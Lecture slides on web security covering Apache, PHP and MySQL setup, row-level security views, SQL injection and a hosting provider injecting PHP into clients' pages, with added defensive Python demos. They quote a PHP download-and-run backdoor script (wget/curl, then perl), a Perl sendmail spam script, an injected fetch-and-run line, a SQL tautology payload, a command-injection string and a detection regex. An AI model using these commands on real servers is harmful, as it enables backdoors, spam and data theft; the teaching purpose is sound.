
Web Security Chien-Chung Shen

Introduction
Web security addresses the issues that are specific to
–how web servers present their content to web browsers
–how the browsers interact with the servers
–how people interact with the browsers
From static content to dynamic content served by the web server
–Static: security reduces mostly to access control on disk files
–Dynamic: e.g., the advertisements in a page are altered depending on what can be guessed about the geographical location and personal preferences of the visitor
Dynamic content creation frequently requires that the web server be connected to a database server
–the information that is dished out dynamically is placed in the database server
–a mechanism/tool is needed that can analyze the URL received from a visitor's browser and any other available information on the visitor, decide what to fetch from the database for the request at hand, and then compose a web page to be sent back to the visitor
That mechanism/tool is a server-side script, typically PHP (or ASP on Microsoft platforms), especially with the open-source Apache web server and a MySQL database backend

Install Apache, PHP5, & MySQL
Install LAMP (Linux, Apache, MySQL, and PHP) on Ubuntu, following a "How to install LAMP on Ubuntu" guide
To automatically resize windows in an Ubuntu VM under VirtualBox:
$ sudo apt-get install virtualbox-guest-dkms virtualbox-guest-utils virtualbox-guest-x11

Install and Configure Apache2 (1)
To make sure that your Apache2 web server is running, point your browser to the server's URL
–Browser displays the default "It Works!" page (/var/www/index.html; on newer Ubuntu releases the document root is /var/www/html)
Check that the server processes are running by executing
ps aux | grep apache
Every once in a while you will have to change the config file for the web server. When you do that, you need to reload the new configuration into the server
–"Graceful" way is to run /etc/init.d/apache2 reload as root; running workers finish their current requests before picking up the new configuration
–Run /etc/init.d/apache2 restart to restart the server, which also loads the new configuration but drops in-flight connections
Main configuration file for the Apache2 HTTPD server is /etc/apache2/apache2.conf, which pulls in more site-specific config information from the files in the directories sites-enabled and mods-enabled

Install and Configure Apache2 (2)
Directories mods-available and mods-enabled
–Before you can use any of the directives in config files, you have to first enable the modules that implement those directives
–For example, the "userdir" module must be enabled before the "UserDir" directive can appear in config files
Enable a module by executing a2enmod and disable a module by a2dismod (both create or remove symbolic links from mods-enabled into mods-available)
a2enmod userdir // enable userdir module
Place the following directives in apache2.conf if your web content is going to be served from the account cshen, out of subdirectories of its home that may be named public-web or public_html:
UserDir enabled cshen
UserDir public-web public_html
–Note that userdir is on for every account unless it is first switched off with a UserDir disabled line; put that line before the two above so that only cshen's directories are exposed as ~user URLs, not every home directory on the machine

Install and Configure Apache2 (3)
Get the web server to dish out the pages that may reside in the different accounts on your Ubuntu machine
–The directory that holds the configuration for the sites (virtual hosts) the server exposes is /etc/apache2/sites-available/
$ cd /etc/apache2/sites-available
$ cp 000-default.conf cshen.conf
Insert a Directory block for the user web directories into cshen.conf containing:
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Require all granted
–Indexes produces a directory listing for any directory without an index file, and FollowSymLinks lets a symlink placed in the user's directory expose any file the server process can read; on a shared machine prefer -Indexes and SymLinksIfOwnerMatch (as in the CGI block on the next slide)
Go back to directory /etc/apache2/ and enable the cshen "virtual server"
$ a2ensite cshen
This creates a symbolic link in directory sites-enabled pointing at the cshen file in directory sites-available; reload the server afterwards

Install and Configure Apache2 (4)
If web pages being served out by Apache2 invoke CGI scripts, you have to tell the server where to find them and that they may be executed
Assume CGI scripts are in my own directory
Include in the cshen.conf file in the sites-available directory a Directory block for that directory containing the following directives
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Require all granted
–ExecCGI lets the server execute scripts placed in that directory, so the directory must not be writable by anyone you do not trust to run code on the server
Reload the new configuration by
$ service apache2 reload

Introduction to PHP
Recursive acronym for "PHP: Hypertext Preprocessor"
–in the same way that GNU stands for "GNU's Not Unix"
Most popular server-side scripting language for generating dynamic content for web pages
–Excellent language support for interacting with practically all commonly-used databases
How PHP runs on your machine is determined by the php.ini file (for example, its disable_functions setting lists the PHP functions the interpreter refuses to run)

PHP's System Program Execution Functions
exec: executes an external program on the server and can fill an array with the lines of output produced by the program
passthru: runs external programs in a way similar to exec and system, but passes the raw output straight through, which suits programs that produce binary data meant to be sent back to the browser
system: works much like the system() function in Perl
shell_exec: works in the same way as the backticks operator in Perl
Since all four hand a command string to the shell on the server, they must be kept outside the reach of intruders: never build the command string from request data, wrap any argument that must come from outside in escapeshellarg(), and list the functions a site does not need in disable_functions in php.ini

Sample PHP Exploit
<?php
passthru('cd /tmp;wget data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
passthru('cd /tmp;curl -O /data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
system('cd /tmp;wget backdoor.txt;rm -f backdoor.txt*');
system('cd /tmp;curl -O backdoor.txt;rm -f backdoor.txt*');
exec('cd /tmp;wget data/backdoor.txt;rm -f backdoor.txt*');
exec('cd /tmp;curl -O data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
shell_exec('cd /tmp;wget backdoor.txt;rm -f backdoor.txt*');
shell_exec('cd /tmp;curl -O backdoor.txt;rm -f backdoor.txt*');
?>
The attacker is trying to make the server download from some third party a file called backdoor.txt that presumably contains malicious code, run it with perl, and then delete it to remove the evidence
–the malicious code could open an IRC channel for command and control
–the same action is repeated with two download tools and all four execution functions, so the script still works on a server where some of them are missing or disabled
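The exploit above only works because an attacker-controlled string reaches one of the execution functions listed on the previous slide. The following added example (my code, not from the lecture) reproduces that hole and its fix with Python's subprocess: with shell=True the string is handed to /bin/sh exactly as PHP's passthru()/system() hand it to the shell, so a ';' in a request parameter becomes a second command. The host parameter, the use of echo as a stand-in for the real command (e.g. ping), and the allow-list regex are assumptions of this demo.

```python
"""Command injection through a request parameter, and the two-part fix:
validate against an allow-list, then execute without a shell."""
import re
import subprocess

# Attacker-controlled value as it would arrive in $_GET['host']; in the
# lecture's scenario the second command would be the wget/curl of backdoor.txt.
INJECTED = "example.org; echo INJECTED"

# RFC 1123-style hostname: dot-separated labels of letters, digits and hyphens.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def run_vulnerable(host):
    """Like passthru("echo " . $_GET['host']): one string, parsed by sh, so
    metacharacters in the parameter start new commands."""
    result = subprocess.run("echo " + host, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def hardened_accepts(host):
    """Allow-list check: True only for a plain hostname."""
    return bool(_HOSTNAME.match(host))


def run_hardened(host):
    """Reject anything that is not a hostname, then exec without a shell:
    argv is a list, so the value is one argument to echo and never reaches sh."""
    if not hardened_accepts(host):
        raise ValueError("rejected host parameter: %r" % host)
    result = subprocess.run(["echo", host], capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    print("vulnerable:", repr(run_vulnerable(INJECTED)))   # second command ran
    try:
        run_hardened(INJECTED)
    except ValueError as err:
        print("hardened  :", err)
    print("hardened  :", repr(run_hardened("example.org")))
```

In PHP the same shape applies: validate the value first, and if a shell is unavoidable, pass each argument through escapeshellarg(); the regex is deliberately strict rather than a blocklist of ';', '|' and '&', because a blocklist misses newline, backticks and $() substitution.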

PHP Exploit to Spew out Spam (1)
An unethical provider of web hosting services wants to inject some PHP code into web pages uploaded to his server by unsuspecting clients
He knows that the injected PHP code will NOT be visible to a client even when the client views the page source in his/her browser because, by design, PHP is executed and stripped out on the server before the page is sent to the browser. So, to the client, the web page will look exactly as it was uploaded
–the only way for the client to notice is to read the file as stored on the server (e.g., over FTP/SFTP), not through the web server
The injected code causes a spam file to be quietly downloaded from a third-party spam provider whenever a client page is viewed; the spam file consists of the addresses and the content for each address, in the form of print() commands to an output stream that talks to the sendmail program running on the server

PHP Exploit to Spew out Spam (2)
Configuration
Web Hosting Service Provider:
–IP:
–OS: Ubuntu
–Web server: Apache2
–MTA: sendmail
Innocent Client:
–IP:
–OS: Mac OS X
–Web browser: Firefox
Spam list provider:
–

PHP5 Installation
Install the PHP5-CLI package
–the CLI can locate syntax errors in PHP scripts by simply running 'php -l yourscript.php'
–the CLI executable php is installed in /usr/bin/
Inside /etc/apache2/mods-enabled, edit php5.conf: after the existing FilesMatch block that maps .php files to SetHandler application/x-httpd-php, add a second FilesMatch block for .html files with the same SetHandler application/x-httpd-php line
–This enables application of the PHP preprocessor to regular .html files as well
–Ordinarily, the web server would invoke the PHP preprocessor only on files that end in ".php", ".php5", etc.
–Caveat: with this mapping every .html file under the document root is executable server-side code, which is exactly what the spam exploit that follows relies on; do not enable it on a server that hosts pages uploaded by others

Spam File Executable by Perl
# Each block pipes one message into sendmail: -t takes the recipients from the
# To: header, -oi keeps a line holding a single dot from ending the message
open SENDMAIL, "|/usr/sbin/sendmail -t -oi";
print SENDMAIL "From: \n";
print SENDMAIL "To: \n";
print SENDMAIL "Subject: I am so lonely, please call \n\n";
print SENDMAIL "\n\nYou may not believe this, but I know you already.";
print SENDMAIL "I promise you will not regret it if you call me at \n";
print SENDMAIL "\n\nIf you call, I will send you my photo that you will drool over. Call soon.\n";
print SENDMAIL "\n\n";
close SENDMAIL;
# The real file repeats such a block once per harvested address
open SENDMAIL, "|/usr/sbin/sendmail -t -oi";
print SENDMAIL "From: \n";
print SENDMAIL "To: \n";
print SENDMAIL "Subject: you just won a lottery \n\n";
print SENDMAIL "\n\nYes, you have won loads of money.\n\n";
print SENDMAIL "\n\nYou can now have fun the rest of your life.\n\n";
print SENDMAIL "\n\n Call immediately at to claim your prize.\n\n";
print SENDMAIL "\n\n";
close SENDMAIL;

Uploaded Web Page
The upload page uses an HTML form with enctype="multipart/form-data" to upload a file (web page) through the <input type="file"> element
This element causes the form to display a "Browse" button that the user can use to locate the file that he/she wants to upload to the web server
The page names uploadfile.php as the "Submit" action of the form
–this ".php" file at the web server contains the PHP code that stores (and, in the exploit, rewrites) the uploaded file
Upload page: UploadYourWebPage.html
Form label: Filename for your web page: followed by the "Browse" button

Upload Page

MySQL with Row-Level Security
MySQL database with row-level security serving as a backend to the Apache web server
–a user is only allowed to access (and, possibly, modify) certain designated rows of a database table
–e.g., customer account information in a bank is stored in one or more database tables. When a customer logs in remotely to see his/her bank balance, the bank restricts that customer to just those rows of the table that contain information specific to that customer's account
Example MySQL setup
–user: Manager
–database name: Manager_db
–table name: Maintenance_Schedule
Example table
| operator_name | equipment | deadline |
| Operator1 | Engine parts | |
| Operator2 | Transmission | |

MySQL with Row-Level Security
Three accounts: Operator1, Operator2, Operator3 (spelled exactly as the operator_name values, since MySQL user names are case-sensitive)
When any of these three individuals accesses the Manager_db database, in particular its Maintenance_Schedule table, each operator is able to view only his/her own row and no other rows

MySQL Installation (1)
Server executable: /usr/sbin/mysqld
Command-line shell executable: /usr/bin/mysql
Command-line database administration utility: /usr/bin/mysqladmin
–-u: the database account to use (root below)
–-p: prompt for that account's password (passing it on the command line instead would leave it in the shell history and the process list)
To check the server is running: $ mysqladmin -u root -p ping
To check the version: $ mysqladmin -u root -p version
To change the password: $ mysqladmin -u root -p password xyz
To check status: $ mysqladmin -u root -p status
To shut down: $ mysqladmin -u root -p shutdown
To start: $ /usr/bin/mysqld_safe --user=root &
–this runs the server as the OS root user, acceptable only for a throwaway VM; the packaged init script (and any production setup) runs it as the unprivileged mysql account, i.e. --user=mysql
Config files are inside /etc/mysql/, with most of the config information in /etc/mysql/my.cnf

MySQL Installation (2)
Set up account: Manager
–Setting up a new account means entering information in the user table of the mysql database that comes preinstalled with the database system
–Fire up the mysql shell: /usr/bin/mysql -u root -p
–Print out all rows, but only the columns Host and User, from the user table of the mysql database
mysql> select User, Host from mysql.user;
| User | Host |
| root | |
| root | ::1 |
| debian-sys-maint | localhost |
| root | localhost |
| root | wheatgrass |
5 rows in set (0.00 sec)
–A user account in MySQL is always identified by the combination 'username'@'host'
–The host entry means that user username will only be allowed to connect to the database from that host
–If a user is allowed to connect from anywhere, the host entry in the second column for such a user is the symbol %
–So the four root accounts are different accounts, each with its own password, even though the usernames are the same and all four hosts refer to the same machine

MySQL Installation (3)
mysql> show databases;
mysql> show tables in mysql;
–These tables hold the accounts and privileges the database system needs for its own maintenance, plus documentation
Ask the shell to switch to the mysql database, then list the columns of its user table
mysql> use mysql;
mysql> describe user;
–the system stores 42 different attributes for a database account (the exact count varies between MySQL versions)
–attributes that end in the suffix '_priv' stand for privileges that you may either authorize or deny for individual accounts
Create a new database Manager_db and then a new user account Manager, allowed to connect only from localhost, with full access to that database
mysql> create database Manager_db;
mysql> create user 'Manager'@'localhost';
mysql> set password for 'Manager'@'localhost' = PASSWORD('xxxxxxxx');
mysql> grant all on Manager_db.* to 'Manager'@'localhost';
mysql> show grants for 'Manager'@'localhost';

MySQL Installation (4)
The call PASSWORD('xxxxxx'), with the actual password between single or double quotes, stores a hash of the password in the account row. The shorter one-step form
mysql> create user 'Manager'@'localhost' identified by 'xxxxxx';
does the same: MySQL hashes the password given after identified by too, so the password is not stored in clear text either way (PASSWORD() is deprecated in MySQL 5.7 and gone in 8.0, where alter user ... identified by is the supported way to change a password)
In the syntax used above, we limited Manager's access to MySQL to connections from localhost. To let Manager connect from anywhere (obviously a risky thing to do), use
mysql> create user 'Manager'@'%';
If you just say
mysql> create user Manager;
the default host '%', where % is the wildcard, is assumed anyway for the account Manager, so the account is reachable from any host that can reach the server port
It is also possible to create a new account by invoking the SQL command INSERT to directly insert new account information into the user table of the mysql database. In this case, you must also issue the flush privileges; statement for the newly entered information to take effect

MySQL Installation (5)
To revoke the privileges granted to Manager
mysql> revoke all on Manager_db.* from 'Manager'@'localhost';
Revoking all privileges does not drop the account: the user, host row stays in the mysql.user table and the account can still log in
To completely drop the Manager account created previously
mysql> drop user 'Manager'@'localhost';
As you experiment with MySQL, you will occasionally need to delete a previously created table
mysql> drop table if exists <table>;
If you only want to empty a previously created table
mysql> delete from <table>;
Logged into the database as root, change the password associated with the Manager account by updating its row directly; the where clause selects the account to change (with user = 'root' it would change every root account instead)
mysql> update mysql.user set password = PASSWORD('xxxxx') where user = 'Manager';
mysql> flush privileges;
–set password for 'Manager'@'localhost' = PASSWORD('xxxxx') does the same without editing the grant tables by hand; from MySQL 5.7 on the column is called authentication_string and the direct update form no longer works

MySQL Installation (6)
Change the datatype of a field in a table
mysql> alter table <table> change <old_column> <new_column> <new_type>;
Place SQL commands in an ordinary text file and then execute the file in batch mode through the mysql shell
mysql> source myFileWithSql.txt
There is no terminating semicolon on this statement
When using a text file in this manner, make sure that the first statement in the file is 'use <database>;' for the database the SQL statements are meant for
To see all accounts currently in the system (after use mysql;, or qualify the table as mysql.user)
mysql> select user.User from user;

MySQL Installation (7)
Place a table in this database
mysql> use Manager_db;
mysql> create table Maintenance_Schedule ( operator_name char(20)
-> primary key not null, equipment char(20), deadline Date );
mysql> show tables;
mysql> insert into Maintenance_Schedule values ( 'Operator1', 'Engine parts', ' ' );
mysql> insert into Maintenance_Schedule values ( 'Operator2', 'Transmission', ' ' );
mysql> insert into Maintenance_Schedule values ( 'Operator3', 'Wheels', ' ' );
mysql> select * from Maintenance_Schedule;
mysql> create user Operator1;
mysql> create user Operator2;
mysql> create user Operator3;
mysql> set password for Operator1 = PASSWORD( 'operator1' );
mysql> set password for Operator2 = PASSWORD( 'operator2' );
mysql> set password for Operator3 = PASSWORD( 'operator3' );
–passwords equal to the user name are for this classroom setup only; they are the first thing a brute-force attempt tries

MySQL Installation (8)
We did not specify the hosts for the three Operator accounts. So MySQL will use the default '%' for them, implying that they will be able to connect from anywhere
To find out which database you are currently examining: select database();
To find out what you are logged in as: select user();
To find out what version of MySQL you are running: select version();
To find out all users: select User from mysql.user;
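An added example (my code, not the lecture's) of the check a practitioner runs after the account work on the preceding slides: it audits the list that select User, Host from mysql.user returns and flags the shapes these slides warn about, namely accounts with the % wildcard host, root reachable from anything but the local machine, and anonymous (empty-name) accounts that a default install can leave behind. SAMPLE_ACCOUNTS is constructed; parse_mysql_output() assumes the tab-separated lines that mysql -N -e "select User, Host from mysql.user" prints in batch mode.

```python
"""Audit of MySQL account (User, Host) pairs for risky entries."""

SAMPLE_ACCOUNTS = [            # constructed (User, Host) pairs
    ("root", "localhost"),
    ("root", "::1"),
    ("debian-sys-maint", "localhost"),
    ("Manager", "localhost"),
    ("Operator1", "%"),        # created with no host, so MySQL used '%'
    ("Operator2", "%"),
    ("", "localhost"),         # anonymous account left by a default install
    ("root", "%"),
]

# Hosts that can only be reached from the machine the server runs on.
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def audit_accounts(rows):
    """Return (severity, message) findings for risky 'user'@'host' entries."""
    findings = []
    for user, host in rows:
        if user == "":
            findings.append(("high",
                             "anonymous account reachable from %s" % host))
        elif user == "root" and host not in LOCAL_HOSTS:
            findings.append(("high",
                             "root allowed to connect from %s" % host))
        elif "%" in host:
            findings.append(("medium",
                             "%s has a wildcard host pattern (%s)" % (user, host)))
    return findings


def parse_mysql_output(text):
    """Turn 'mysql -N' batch output (one tab-separated row per line) into
    (User, Host) tuples; blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, host = line.split("\t", 1)
        rows.append((user, host))
    return rows


if __name__ == "__main__":
    for severity, message in audit_accounts(SAMPLE_ACCOUNTS):
        print(severity.upper(), message)
```

The root entry for the machine's own hostname (wheatgrass in the lecture's listing) would also be reported, which is intended: that row matches connections arriving over the network interface, not only over loopback.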

Row-Level Security (1)
Row-level security in MySQL is implemented with the help of views
In general, a view in MySQL is the result table that would ordinarily be returned by a query such as select, but with the difference that the result table is persistent: it is stored under a name and re-evaluated every time it is queried
–a view is a persistent (named) result table
Create a view Operator_view whose where clause compares each row's operator_name with the account running the query
mysql> create view Operator_view as select * from Maintenance_Schedule where operator_name = substring_index(user(), '@', 1);
mysql> grant select on Operator_view to Operator1;
mysql> grant select on Operator_view to Operator2;
mysql> grant select on Operator_view to Operator3;
mysql> quit;
–The operators are granted select on the view only, not on Maintenance_Schedule itself; otherwise they could simply query the base table and see every row

Row-Level Security (2)
mysql> create view Operator_view as select * from Maintenance_Schedule
-> where operator_name = substring_index(user(), '@', 1);
user(): built-in function that returns the account of the current session in the form username@host
substring_index(): built-in function that returns a substring of its first argument, using the second argument as a delimiter and the third argument as the number of delimiter-separated pieces to return, counting from the left for a positive count (the delimiter may occur several times)
–if user() returns Operator1@localhost, the call to substring_index() returns just the string Operator1
–because the filter is evaluated at query time against the caller's session, the same view yields a different row for each operator
–user() is the right function here: a view runs by default with SQL SECURITY DEFINER, under which current_user() would return the view's creator, whereas user() still returns the client that connected
Have Operator2 invoke the mysql shell
/usr/bin/mysql -u Operator2 -p
mysql> use Manager_db;
mysql> show tables;
mysql> select * from Maintenance_Schedule; (denied: Operator2 has no privilege on the base table)
mysql> select * from Operator_view; (returns only Operator2's row)

PHP + MySQL
Web servers that create web pages dynamically frequently require access to backend databases, and not uncommonly this database is MySQL
Review how a PHP-enabled web server works in conjunction with the MySQL database management system
The PHP script makes a direct connection with the MySQL database through the mysql_connect() function call, using the credentials typed into the form fields labelled "MySQL user name:" and "MySQL user password:". Subsequently, the PHP script feeds SQL to the database through mysql_query() function calls and retrieves the results row by row into the $row associative array
–the mysql_* functions were deprecated in PHP 5.5 and removed in PHP 7; current code uses mysqli or PDO, both of which offer prepared statements that bind form values as data instead of pasting them into the SQL text

SQL Injection Attack
When the visitor clicked the "Submit" button of the form, his/her browser sent a URL back to the server hosting the MySQL database whose query string ends in r2&password=operator2, i.e. the user field Operator2 and the password field operator2
For this URL, what is retrieved from the MySQL database is just the row of the Maintenance_Schedule table that corresponds to Operator2
Over plain HTTP this URL travels in clear text and is therefore visible to anyone carrying out traffic surveillance between where Operator2 is located and where the server is installed; it also lands in the browser history, in proxy logs and in the web server's access log
So it would not be difficult for an adversary to replay it, or to mount an attack on the server by trying different values for the user and password fields
A major enabler of the attack was the use of the GET method for form submission: with GET, all of the form fields become part of the URL sent back to the web server (use POST for anything carrying credentials, and HTTPS so that the request body is encrypted as well)
The injection itself, however, does not depend on GET: it happens because the script splices the field value into the SQL text, so a crafted value rewrites the query's where clause; the same value in a POST body injects just as well. The fix is a prepared statement with bound parameters
More complex cases of the same could cause stored procedures to be invoked, or, where the driver allows stacked queries, further statements to be appended and subsequently executed by the database
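An added example (my code, not the lecture's) that serves both the Row-Level Security slides and this one: the Operator_view filter re-evaluated per session, followed by the query that the injection slide describes, first built from the form value by string concatenation and then with a bound parameter. It runs on SQLite so it works offline; MySQL's user() is emulated by a per-connection name registered as the SQL function session_user() (already without the @host part, so substring_index is not needed), and the three table rows, dates included, are constructed sample data.

```python
"""Row-level view plus SQL injection, vulnerable and parameterized, on SQLite."""
import sqlite3

ROWS = [  # constructed rows in the lecture's Maintenance_Schedule layout
    ("Operator1", "Engine parts", "2016-01-15"),
    ("Operator2", "Transmission", "2016-02-01"),
    ("Operator3", "Wheels", "2016-03-10"),
]

_session = {"user": None}   # who is "logged in" on the current connection


def session_user():
    """Stand-in for MySQL's user(), returning just the account name."""
    return _session["user"]


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("session_user", 0, session_user)
    conn.execute("create table Maintenance_Schedule (operator_name text "
                 "primary key, equipment text, deadline text)")
    conn.executemany("insert into Maintenance_Schedule values (?, ?, ?)", ROWS)
    # The view carries the filter: each query through it is evaluated against
    # the caller's session, so every operator sees only his/her own row.
    conn.execute("create view Operator_view as select * from "
                 "Maintenance_Schedule where operator_name = session_user()")
    return conn


def rows_visible_to(conn, account):
    """What 'select * from Operator_view' returns for the given operator."""
    _session["user"] = account
    return conn.execute("select operator_name from Operator_view").fetchall()


def lookup_unsafe(conn, operator):
    """The lecture's pattern: the form value is pasted into the SQL text, as a
    mysql_query() call built with string concatenation does it."""
    sql = ("select operator_name from Maintenance_Schedule "
           "where operator_name = '" + operator + "'")
    return conn.execute(sql).fetchall()


def lookup_safe(conn, operator):
    """Parameterized form: the driver sends the value as data, never as SQL."""
    return conn.execute("select operator_name from Maintenance_Schedule "
                        "where operator_name = ?", (operator,)).fetchall()


# Classic tautology payload; the closing quote is supplied by the query text,
# turning the where clause into: operator_name = '' OR '1'='1'
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = open_db()
    print("Operator2 through the view:", rows_visible_to(db, "Operator2"))
    print("unsafe lookup with payload:", lookup_unsafe(db, PAYLOAD))
    print("safe lookup with payload:  ", lookup_safe(db, PAYLOAD))
```

With the payload, lookup_unsafe() returns every operator's row while lookup_safe() returns nothing, because no operator is literally named ' OR '1'='1. Note that the view alone does not protect the base table: a script that connects with an account holding select on Maintenance_Schedule, as the Manager account does, bypasses the row filter entirely, which is why the lecture connects as the operator.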

Cross-site Scripting (XSS) Attacks
PHP stores various attributes of the uploaded file in the predefined variable $_FILES
When a file is uploaded, PHP stores it initially at a temporary location, accessed by $_FILES["file"]["tmp_name"]; the script must move it explicitly, and nothing about the client-supplied name or type can be trusted
The provider's uploadfile.php creates another file that is identical to what the client uploaded except for the extra PHP code in the statement that ends in line (P)
–viewing the page source in the browser [Firefox: Tools -> Web Developer -> Page Source] shows no trace of it, because the server executed the PHP and sent only its output
An intruder who has broken into the server at the web hosting service can do the same with a simple script that scans all HTML files at the server and injects malicious code into them in the manner presented
Folks whose HTML web pages were corrupted in this manner would never suspect that anything was wrong with their pages
Cross-site scripting (XSS) attack with server-side injection of malicious code
–strictly, PHP injected into a hosted page is server-side code injection (a backdoor); the injected PHP can in turn emit JavaScript, which is what makes it an XSS attack against every visitor of the page
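An added example (my code, not the lecture's or the hosting provider's) of the two checks a practitioner wants here: a scan over a document root for the kind of server-side code the provider injected into clients' pages, and the upload-side guard that uploadfile.php should have applied. The sample pages, the document-root layout and the 203.0.113.5 address in the injected line are constructed for this demo; the signature list is an assumption and not a complete one.

```python
"""Find injected PHP in hosted HTML pages, and refuse it at upload time."""
import os
import re
import tempfile

# A client's static HTML page has no business containing a PHP open tag ...
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# ... nor, outside a tag, names that only exist in PHP (JavaScript's eval and
# exec are deliberately left out to avoid flagging ordinary client-side script).
PHP_ONLY_CALLS = re.compile(
    r"\b(passthru|shell_exec|popen|base64_decode|curl_exec|file_get_contents)\s*\(",
    re.IGNORECASE)

CLEAN_PAGE = "<html><body><h1>Hello</h1></body></html>\n"
INJECTED_PAGE = (
    "<html><body><h1>Hello</h1>\n"
    "<?php passthru('cd /tmp;wget http://203.0.113.5/spam.txt;perl spam.txt'); ?>\n"
    "</body></html>\n")


def scan_html(text):
    """Return (line_number, reason) for each suspicious line of one page."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if PHP_OPEN_TAG.search(line):
            hits.append((lineno, "php open tag"))
        elif PHP_ONLY_CALLS.search(line):
            hits.append((lineno, "php execution-style call"))
    return hits


def scan_tree(root):
    """Walk a document root; map each .html/.htm file with findings to them."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".html", ".htm")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_html(fh.read())
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


def upload_is_acceptable(client_filename, content):
    """Guard for uploadfile.php's job: drop any directory part of the
    client-supplied name, allow only .html/.htm, and refuse content that the
    server would execute when .html files are mapped to the PHP handler."""
    base = os.path.basename(client_filename.replace("\\", "/"))
    if not base.lower().endswith((".html", ".htm")):
        return False
    return PHP_OPEN_TAG.search(content) is None


def build_sample_tree():
    """Create a throwaway document root with one clean and one injected page."""
    root = tempfile.mkdtemp(prefix="docroot_")
    os.makedirs(os.path.join(root, "client1"))
    with open(os.path.join(root, "client1", "index.html"), "w") as fh:
        fh.write(CLEAN_PAGE)
    with open(os.path.join(root, "client1", "about.html"), "w") as fh:
        fh.write(INJECTED_PAGE)
    return root


if __name__ == "__main__":
    for path, hits in scan_tree(build_sample_tree()).items():
        print(path, hits)
```

The scan is a detection aid, not proof of cleanliness: obfuscated injections (concatenated strings, short tags, code split across lines) can slip past it, so the durable fix stays on the server side, i.e. not mapping .html to the PHP handler and storing uploads outside any directory the handler serves.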